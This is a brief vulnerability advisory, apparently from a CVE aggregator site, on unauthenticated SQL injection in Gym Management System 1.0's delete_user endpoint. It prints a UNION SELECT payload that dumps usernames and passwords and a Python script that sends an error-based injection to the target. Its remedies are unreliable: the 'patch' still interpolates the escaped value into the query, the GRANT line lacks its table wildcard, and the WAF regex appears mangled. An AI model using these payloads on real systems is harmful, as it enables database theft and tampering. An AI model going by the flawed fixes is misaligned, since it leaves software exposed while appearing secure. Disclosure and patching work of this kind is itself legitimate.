Listen to this Post
How CVE-2025-4484 Works
This critical SQL injection vulnerability exists in Gym Management System 1.0 through the `/ajax.php?action=delete_user` endpoint. The system fails to properly sanitize the `ID` parameter before using it in SQL queries, allowing attackers to inject malicious SQL commands. When crafted SQL payloads are passed via the ID parameter, the backend database executes them with the same privileges as the application. This enables unauthorized data access, modification, or deletion. The vulnerability is remotely exploitable without authentication, making it particularly dangerous as attackers can compromise the entire database.
DailyCVE Form
Platform: Gym Management System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/13/2025
What Undercode Say:
-- Sample Exploit Payload /ajax.php?action=delete_user&ID=1' UNION SELECT 1,username,password,4 FROM users--
Exploit Script Example
import requests
target = "http://target.com/ajax.php"
params = {
"action": "delete_user",
"ID": "1' AND EXTRACTVALUE(0,CONCAT(0x5c,USER()))--"
}
response = requests.get(target, params=params)
print(response.text)
Detection Command curl -s "http://target.com/ajax.php?action=delete_user&ID=1'" | grep -i "error|syntax|mysql"
// Protection Patch $id = mysqli_real_escape_string($conn, $_GET['ID']); $query = "DELETE FROM users WHERE id = '$id'";
-- Database Hardening REVOKE ALL PRIVILEGES ON gym_db. FROM 'gym_user'@'%'; GRANT SELECT, INSERT, UPDATE ON gym_db. TO 'gym_user'@'%';
WAF Rule for Nginx
location ~ ajax.php {
if ($args ~ "action=delete_user.ID=.[';]") {
return 403;
}
}
// Input Validation
function validateID(id) {
return /^\d+$/.test(id);
}
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
